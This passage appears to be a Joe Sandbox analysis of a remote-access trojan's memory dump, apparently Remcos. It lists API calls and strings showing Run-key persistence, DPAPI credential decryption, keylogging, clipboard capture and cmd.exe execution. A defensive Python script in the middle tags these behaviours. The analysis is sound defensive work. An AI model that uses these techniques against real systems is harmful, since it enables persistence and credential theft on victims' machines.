                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Create$EventLocalThreadTime
                                                                                                                                                • String ID: KeepAlive | Enabled | Timeout:
                                                                                                                                                • API String ID: 2532271599-1507639952
                                                                                                                                                • Opcode ID: a02ae91ac195284b5da0ea0fcd2ef2636c7927f14dee073a7222123f061fd718
                                                                                                                                                • Instruction ID: 41fa32a9fb91b1633a7afb8999ae97baef60c60c8d6252053b050d354fdafbcf
                                                                                                                                                • Opcode Fuzzy Hash: a02ae91ac195284b5da0ea0fcd2ef2636c7927f14dee073a7222123f061fd718
                                                                                                                                                • Instruction Fuzzy Hash: 82110A71800385BAC720A7779C0DEAB7FACDBD2714F04046FF54162291D6B89445CBBA
                                                                                                                                                APIs
                                                                                                                                                • LoadLibraryA.KERNEL32(crypt32,CryptUnprotectData), ref: 00406ABD
                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00406AC4
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                                                                • String ID: CryptUnprotectData$crypt32
                                                                                                                                                • API String ID: 2574300362-2380590389
                                                                                                                                                • Opcode ID: 905686a6130e311fdcec2a0cd22c75bab7e39712089f0cc697143e337071fc99
                                                                                                                                                • Instruction ID: 59ed3cbb63f31e38ea488d6bd85f24bb9ff1ce5495ed4d1509158228521d53cd
                                                                                                                                                • Opcode Fuzzy Hash: 905686a6130e311fdcec2a0cd22c75bab7e39712089f0cc697143e337071fc99
                                                                                                                                                • Instruction Fuzzy Hash: 2C01B975604216BBCB18CFAD9D449AF7BB4AB45300B00417EE956E3381DA74E9008B95
                                                                                                                                                APIs
                                                                                                                                                • SetFilePointerEx.KERNEL32(00000000,00000000,00000002,FF8BC369,00000000,FF8BC35D,00000000,10558B1C,10558B1C,PkGNG,0044C382,FF8BC369,00000000,00000002,00000000,PkGNG), ref: 0044C30C
                                                                                                                                                • GetLastError.KERNEL32 ref: 0044C316
                                                                                                                                                • __dosmaperr.LIBCMT ref: 0044C31D
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ErrorFileLastPointer__dosmaperr
                                                                                                                                                • String ID: PkGNG
                                                                                                                                                • API String ID: 2336955059-263838557
                                                                                                                                                • Opcode ID: 97215d8b8c2dce734124090270f13308d8b04423b03663272671d6b8c31aea6f
                                                                                                                                                • Instruction ID: 8193a85edd99f1e073baf55791db2896ff72ac9ff19ac05387a69161c0de0417
                                                                                                                                                • Opcode Fuzzy Hash: 97215d8b8c2dce734124090270f13308d8b04423b03663272671d6b8c31aea6f
                                                                                                                                                • Instruction Fuzzy Hash: FB019032A11108BBDB01DFDDDC4586E7B19EB81320B28034EFD2097280EAB4DD119794
                                                                                                                                                APIs
                                                                                                                                                • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00405159), ref: 00405173
                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 004051CA
                                                                                                                                                • SetEvent.KERNEL32(?), ref: 004051D9
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CloseEventHandleObjectSingleWait
                                                                                                                                                • String ID: Connection Timeout
                                                                                                                                                • API String ID: 2055531096-499159329
                                                                                                                                                • Opcode ID: 638b915a1fb33ffee36d9cd6321bbf62091d502496d276d1835a730be56b6213
                                                                                                                                                • Instruction ID: b176daa04f7f78a72cd0d213bf0bcd41e0e3849ccec9e2477ca34bbc74fb9340
                                                                                                                                                • Opcode Fuzzy Hash: 638b915a1fb33ffee36d9cd6321bbf62091d502496d276d1835a730be56b6213
                                                                                                                                                • Instruction Fuzzy Hash: C901F530940F00AFD7216B368D8642BBFE0EF00306704093EE68356AE2D6789800CF89
                                                                                                                                                APIs
                                                                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E86E
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Exception@8Throw
                                                                                                                                                • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                • API String ID: 2005118841-1866435925
                                                                                                                                                • Opcode ID: e1bdae5122e534e22181349a294e5dd283a76e5484cb2b4dd901af9da0e19607
                                                                                                                                                • Instruction ID: 287a1f786264602a2f100ba68ee8cd07dacd1bfc9ef62352ff5e55a88b78f620
                                                                                                                                                • Opcode Fuzzy Hash: e1bdae5122e534e22181349a294e5dd283a76e5484cb2b4dd901af9da0e19607
                                                                                                                                                • Instruction Fuzzy Hash: 59018F626583087AEB14B697CC03FBA33685B10708F10CC3BBD01765C2EA7D6A61C66F
                                                                                                                                                APIs
                                                                                                                                                • FormatMessageA.KERNEL32(00001100,00000000,00000000,00000400,?,00000000,00000000,00474EF8,00474EF8,PkGNG,00404A40), ref: 0041CB9A
                                                                                                                                                • LocalFree.KERNEL32(?,?), ref: 0041CBC0
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: FormatFreeLocalMessage
                                                                                                                                                • String ID: @J@$PkGNG
                                                                                                                                                • API String ID: 1427518018-1416487119
                                                                                                                                                • Opcode ID: 43e67b6722ad7e97e4d7411bd93802a0b45ac2c2c041eafaafa940aa2d942fec
                                                                                                                                                • Instruction ID: 923000db8f6a2d31ebee0df48ef62036c6bc2ff20d3f060cbaedccf048ea6ec3
                                                                                                                                                • Opcode Fuzzy Hash: 43e67b6722ad7e97e4d7411bd93802a0b45ac2c2c041eafaafa940aa2d942fec
                                                                                                                                                • Instruction Fuzzy Hash: 34F0A930B00219A6DF14A766DC4ADFF772DDB44305B10407FB605B21D1DE785D059659
                                                                                                                                                APIs
                                                                                                                                                • RegCreateKeyW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,?), ref: 0041385A
                                                                                                                                                • RegSetValueExW.ADVAPI32(?,00000000,00000000,00000001,00000000,00000000,?,?,?,?,00000000,004752D8,74DF37E0,?), ref: 00413888
                                                                                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,004752D8,74DF37E0,?,?,?,?,?,0040CFE5,?,00000000), ref: 00413893
                                                                                                                                                Strings
                                                                                                                                                • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00413858
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CloseCreateValue
                                                                                                                                                • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                                                                                                                                • API String ID: 1818849710-1051519024
                                                                                                                                                • Opcode ID: 3da2de30dd2e4c2ff773a1c969aacac889c14d245fa7b83563a43fe4ea506f1b
                                                                                                                                                • Instruction ID: 9133f253890910ff78e8f434c24b82038cc7026402723a24ca4ec17c3e6d8cb5
                                                                                                                                                • Opcode Fuzzy Hash: 3da2de30dd2e4c2ff773a1c969aacac889c14d245fa7b83563a43fe4ea506f1b
                                                                                                                                                • Instruction Fuzzy Hash: 15F0C271440218FBCF00AFA1EC45FEE376CEF00756F10452AF905A61A1E7759E04DA94
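The entries above are the raw material a triage analyst works from: the function at 0041385A writes an autorun value under the Policies\Explorer\Run key with hKey 80000002 (HKEY_LOCAL_MACHINE), the function at 00406ABD resolves crypt32!CryptUnprotectData at run time through LoadLibraryA/GetProcAddress (the DPAPI call behind the browser-password signatures), and the 0040AFA9 and 00404F81 functions spin up the keylogger and KeepAlive threads. The script below is an added example, not Joe Sandbox or Remcos code: it parses the report's "APIs / Strings / Similarity" layout (including the "Part of subcall function" lines and the `$`-joined String ID) and applies a small rule set that requires both an API and a string match before tagging a function. The tag names and the rules are the script's own; SAMPLE is constructed by copying four of the entries above in the report's layout, with hashes and dump-source lines omitted.

```python
"""Triage Joe Sandbox function summaries (APIs / Strings / Similarity blocks) into
behaviour tags. Added example, not Joe Sandbox or Remcos code; rules and tags are ours."""
import re
from collections import namedtuple
from dataclasses import dataclass, field

SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin",
            "Yara matches", "Similarity"}
API_RE = re.compile(r"^(?P<name>[\w:@]+)\.(?P<mod>[A-Z0-9]+)"
                    r"(?:\((?P<args>.*)\))?,? ref: (?P<ref>[0-9A-Fa-f]{8})$")
STR_RE = re.compile(r"^(?P<s>.*), xrefs: [0-9A-Fa-f]{8}$")
HIVES = {"80000001": "HKCU", "80000002": "HKLM"}  # RegCreateKeyW hKey argument
ApiCall = namedtuple("ApiCall", "name module args ref subcall")


@dataclass
class FunctionSummary:
    apis: list = field(default_factory=list)
    strings: list = field(default_factory=list)
    similarity: dict = field(default_factory=dict)

    def text(self):
        # Strings section, the '$'-joined String ID and every API argument literal
        parts = self.strings + self.similarity.get("String ID", "").split("$")
        parts += [arg for a in self.apis for arg in a.args]
        return " ".join(p.strip() for p in parts)


def parse_summaries(report):
    """One FunctionSummary per 'APIs' block; other sections are skipped."""
    records, cur, section = [], None, None
    for raw in report.splitlines():
        line = raw.strip()
        if line in SECTIONS:
            section = line
            if line == "APIs":
                cur = FunctionSummary()
                records.append(cur)
            continue
        if cur is None or not line.startswith("•"):
            continue
        item = line[1:].strip()
        if section == "APIs":
            sub = item.startswith("Part of subcall function")
            m = API_RE.match(item.split(": ", 1)[1] if sub else item)
            if m:
                args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
                cur.apis.append(ApiCall(m["name"], m["mod"], args, m["ref"], sub))
        elif section == "Strings":
            m = STR_RE.match(item)
            if m:
                cur.strings.append(m["s"].strip())
        elif section == "Similarity":
            key, _, val = item.partition(": ")
            cur.similarity[key] = val
    return records


def triage(rec):
    """Behaviour rules for one summary; each needs API plus string evidence."""
    names, text, tags = {a.name for a in rec.apis}, rec.text(), []
    if (any(n.startswith("RegCreateKey") for n in names)
            and any(n.startswith("RegSetValueEx") for n in names)
            and r"Policies\Explorer\Run" in text):
        hive = next((a.args[0] for a in rec.apis
                     if a.name.startswith("RegCreateKey") and a.args), "?")
        tags.append("persistence:" + HIVES.get(hive, hive) + r" Policies\Explorer\Run")
    if "GetProcAddress" in names and "CryptUnprotectData" in text:
        tags.append("credential-access:dpapi-CryptUnprotectData")
    if "CreateThread" in names and "Keylogger Started" in text:
        tags.append("collection:keylogger-thread")
    if "CreateThread" in names and "KeepAlive" in text:
        tags.append("c2:keepalive-thread")
    return tags


def triage_report(report):
    """{address of first direct API call: tags} for each summary with a hit."""
    out = {}
    for i, rec in enumerate(parse_summaries(report)):
        tags = triage(rec)
        if tags:
            out[next((a.ref for a in rec.apis if not a.subcall), f"#{i}")] = tags
    return out


# Constructed sample: four entries copied from the report above in its own layout.
SAMPLE = r"""
APIs
  • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,Offline Keylogger Started,004750F0), ref: 0040B1AD
• CreateThread.KERNEL32(00000000,00000000,0040A2A2,?,00000000,00000000), ref: 0040AFA9
APIs
• CreateThread.KERNEL32(00000000,00000000,00405150,?,00000000,00000000), ref: 00404FE0
Strings
• KeepAlive | Enabled | Timeout: , xrefs: 00404F94
APIs
• LoadLibraryA.KERNEL32(crypt32,CryptUnprotectData), ref: 00406ABD
• GetProcAddress.KERNEL32(00000000), ref: 00406AC4
Similarity
• String ID: CryptUnprotectData$crypt32
APIs
• RegCreateKeyW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,?), ref: 0041385A
• RegSetValueExW.ADVAPI32(?,00000000,00000000,00000001,00000000,00000000,?), ref: 00413888
"""
```

Run `triage_report(SAMPLE)` and the four functions come back keyed by the address of their first direct call, each with one tag. Requiring an API name and a string in the same function keeps CRT noise such as the FormatMessageA and `bad locale name` entries out of the result; the "PkGNG" string that recurs across entries is deliberately not used as evidence, since the report gives no meaning for it.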

APIs
• std::_Lockit::_Lockit.LIBCPMT ref: 0040DFEC
• std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040E02B
  • Part of subcall function 004356CD: _Yarn.LIBCPMT ref: 004356EC
  • Part of subcall function 004356CD: _Yarn.LIBCPMT ref: 00435710
• __CxxThrowException@8.LIBVCRUNTIME ref: 0040E051
Memory Dump Source
• Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
Similarity
• API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
• String ID: bad locale name
• API String ID: 3628047217-1405518554

APIs
• CreateThread.KERNEL32(00000000,00000000,Function_0001D4EE,00000000,00000000,00000000), ref: 00416C82
• ShowWindow.USER32(00000009), ref: 00416C9C
• SetForegroundWindow.USER32 ref: 00416CA8
  • Part of subcall function 0041CE2C: AllocConsole.KERNEL32(00475338), ref: 0041CE35
  • Part of subcall function 0041CE2C: ShowWindow.USER32(00000000,00000000), ref: 0041CE4E
  • Part of subcall function 0041CE2C: SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CE73
Memory Dump Source
• Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
Similarity
• API ID: Window$ConsoleShow$AllocCreateForegroundOutputThread
• String ID: !D@
• API String ID: 3446828153-604454484

APIs
• ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 0041616B
Memory Dump Source
• Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
Similarity
• API ID: ExecuteShell
• String ID: /C $cmd.exe$open
• API String ID: 587946157-3896048727

APIs
• GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 00401414
• GetProcAddress.KERNEL32(00000000), ref: 0040141B
Memory Dump Source
• Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
Similarity
• API ID: AddressHandleModuleProc
• String ID: GetCursorInfo$User32.dll
• API String ID: 1646373207-2714051624

APIs
• LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 004014B9
• GetProcAddress.KERNEL32(00000000), ref: 004014C0
Memory Dump Source
• Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
Similarity
• API ID: AddressLibraryLoadProc
• String ID: GetLastInputInfo$User32.dll
• API String ID: 2574300362-1519888992

Strings
• [Cleared browsers logins and cookies.], xrefs: 0040C11F
• Cleared browsers logins and cookies., xrefs: 0040C130
Memory Dump Source
• Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
Similarity
• API ID: Sleep
• String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
• API String ID: 3472027048-1236744412

APIs
  • Part of subcall function 0041C5E2: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041C5F2
  • Part of subcall function 0041C5E2: GetWindowTextLengthW.USER32(00000000), ref: 0041C5FB
  • Part of subcall function 0041C5E2: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0041C625
• Sleep.KERNEL32(000001F4), ref: 0040A5AE
• Sleep.KERNEL32(00000064), ref: 0040A638
Memory Dump Source
• Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
Similarity
• API ID: Window$SleepText$ForegroundLength
• String ID: [ $ ]
• API String ID: 3309952895-93608704

APIs
• ___BuildCatchObject.LIBVCRUNTIME ref: 004398FA
  • Part of subcall function 00439F32: ___AdjustPointer.LIBCMT ref: 00439F7C
• _UnwindNestedFrames.LIBCMT ref: 00439911
• ___FrameUnwindToState.LIBVCRUNTIME ref: 00439923
• CallCatchBlock.LIBVCRUNTIME ref: 00439947
Memory Dump Source
• Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
Similarity
• API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
• String ID:
• API String ID: 2633735394-0

APIs
• GetSystemMetrics.USER32(0000004C), ref: 0041942B
• GetSystemMetrics.USER32(0000004D), ref: 00419431
• GetSystemMetrics.USER32(0000004E), ref: 00419437
• GetSystemMetrics.USER32(0000004F), ref: 0041943D
Memory Dump Source
• Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
Similarity
• API ID: MetricsSystem
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 4116985748-0
                                                                                                                                                • Opcode ID: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
                                                                                                                                                • Instruction ID: fd4820a3fb0c8fcfb80096478546269f04700e3de9cdf271d69d174aa35805c7
                                                                                                                                                • Opcode Fuzzy Hash: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
                                                                                                                                                • Instruction Fuzzy Hash: 3FF0A4B1B043155BD700EE758C51A6B6ADAEBD4364F10043FF60887281EFB8DC468B84
                                                                                                                                                APIs
                                                                                                                                                • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00438FB1
                                                                                                                                                • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00438FB6
                                                                                                                                                • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00438FBB
                                                                                                                                                  • Part of subcall function 0043A4BA: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 0043A4CB
                                                                                                                                                • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00438FD0
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1761009282-0
                                                                                                                                                • Opcode ID: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                                                                                                                                • Instruction ID: 3a6c9073cd349407f79861cc5a63413a30b4b1af88e8d748f4708d1390bfb410
                                                                                                                                                • Opcode Fuzzy Hash: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                                                                                                                                • Instruction Fuzzy Hash: 8DC04C44080381552C50B6B2110B2AF83521C7E38CF9074DFBDD1579474D5D052F553F
                                                                                                                                                APIs
                                                                                                                                                • __startOneArgErrorHandling.LIBCMT ref: 00442D3D
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ErrorHandling__start
                                                                                                                                                • String ID: pow
                                                                                                                                                • API String ID: 3213639722-2276729525
                                                                                                                                                • Opcode ID: ba08a0cb9aac2d09af1d9c353536d0054585ad8ee24c5cded07915036f7ff901
                                                                                                                                                • Instruction ID: 2abd0c7c8e13d4a8cd2c8141c546921d868ac315c0d238e81b652aa6ec7fde8b
                                                                                                                                                • Opcode Fuzzy Hash: ba08a0cb9aac2d09af1d9c353536d0054585ad8ee24c5cded07915036f7ff901
                                                                                                                                                • Instruction Fuzzy Hash: 92515AE1E0460296FB167714CE4137B6794AB50741F70497BF0D6823EAEA7C8C859B4F
                                                                                                                                                APIs
                                                                                                                                                • WideCharToMultiByte.KERNEL32(000000FF,00000000,00000006,00000001,?,?,00000000,?,00000000,?,?,00000000,00000006,?,?,?), ref: 00449F8F
                                                                                                                                                • GetLastError.KERNEL32 ref: 00449FAB
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ByteCharErrorLastMultiWide
                                                                                                                                                • String ID: PkGNG
                                                                                                                                                • API String ID: 203985260-263838557
                                                                                                                                                • Opcode ID: d1185fb95bfff78fff583c453b007e19375680cfc0f7d37f8e74ebb942ffdfee
                                                                                                                                                • Instruction ID: e4919e29a80df6b7ced925805d10dfcffaa1b378e184719e11b938f1b8f94c7b
                                                                                                                                                • Opcode Fuzzy Hash: d1185fb95bfff78fff583c453b007e19375680cfc0f7d37f8e74ebb942ffdfee
                                                                                                                                                • Instruction Fuzzy Hash: 2331E430200201ABFB21EF56C845BAB7768EF45721F15016BF815C7391DB38CD45E7A9
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                                                                                                                                • __Init_thread_footer.LIBCMT ref: 0040B7D2
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Init_thread_footer__onexit
                                                                                                                                                • String ID: [End of clipboard]$[Text copied to clipboard]
                                                                                                                                                • API String ID: 1881088180-3686566968
                                                                                                                                                • Opcode ID: 7be63757e29b9f91be4cc1fce50211db745ac7e2ddcf3fa0e25e131e1c8bf245
                                                                                                                                                • Instruction ID: 844f446031992ee5170c212df839aebd4a436c67f2956c9e8fe8aff684c3a130
                                                                                                                                                • Opcode Fuzzy Hash: 7be63757e29b9f91be4cc1fce50211db745ac7e2ddcf3fa0e25e131e1c8bf245
                                                                                                                                                • Instruction Fuzzy Hash: 30217131A102198ACB14FBA6D8929EDB375AF54318F10443FE505771D2EF786D4ACA8C
                                                                                                                                                APIs
                                                                                                                                                • GetACP.KERNEL32(?,20001004,?,00000002), ref: 00451C92
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: ACP$OCP
                                                                                                                                                • API String ID: 0-711371036
                                                                                                                                                • Opcode ID: 28d359b86f53a769e50845c8979a9c95ba506d3f4f520eddc938968d94c37ac1
                                                                                                                                                • Instruction ID: 09b953eaa346ea86c897215e5a2a15a508f8bcb16f9b984b1dadcb699cf7d301
                                                                                                                                                • Opcode Fuzzy Hash: 28d359b86f53a769e50845c8979a9c95ba506d3f4f520eddc938968d94c37ac1
                                                                                                                                                • Instruction Fuzzy Hash: E821D862A80204A6DB36CF14C941BAB7266DB54B13F568426ED0AD7322F73BED45C35C
                                                                                                                                                APIs
                                                                                                                                                • WriteFile.KERNEL32(?,?,?,?,00000000,FF8BC35D,00000000,?,PkGNG,0044BBEE,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0044B85B
                                                                                                                                                • GetLastError.KERNEL32 ref: 0044B884
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ErrorFileLastWrite
                                                                                                                                                • String ID: PkGNG
                                                                                                                                                • API String ID: 442123175-263838557
                                                                                                                                                • Opcode ID: 9f33f136d580808b36a549075194831cac44b680ed95d57240af363647088f83
                                                                                                                                                • Instruction ID: 9972a58bdd01e134d13becd973f3089a2f7b3635eb9ddb95e5d59f4384582b5e
                                                                                                                                                • Opcode Fuzzy Hash: 9f33f136d580808b36a549075194831cac44b680ed95d57240af363647088f83
                                                                                                                                                • Instruction Fuzzy Hash: B2316F31A00619DBCB24DF59DD8099AF3F9FF48301B1485AAE909D7261E734ED81CBA8
                                                                                                                                                APIs
                                                                                                                                                • WriteFile.KERNEL32(?,?,?,?,00000000,FF8BC35D,00000000,?,PkGNG,0044BC0E,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0044B76D
                                                                                                                                                • GetLastError.KERNEL32 ref: 0044B796
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ErrorFileLastWrite
                                                                                                                                                • String ID: PkGNG
                                                                                                                                                • API String ID: 442123175-263838557
                                                                                                                                                • Opcode ID: 482fa6ac77512a0fc819500aa413458c203250297fd7de672378db3e029a087c
                                                                                                                                                • Instruction ID: c865f2f287ade0309940dd9d446f9ab1351fd896516eb6f8948e0fb5ca6ebdce
                                                                                                                                                • Opcode Fuzzy Hash: 482fa6ac77512a0fc819500aa413458c203250297fd7de672378db3e029a087c
                                                                                                                                                • Instruction Fuzzy Hash: 69219435600219DFDB14CF69D980BEAB3F9EB48312F1048AAE94AD7251D734ED85CB64
                                                                                                                                                APIs
                                                                                                                                                • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415D04,?,00000001,0000004C,00000000), ref: 00405030
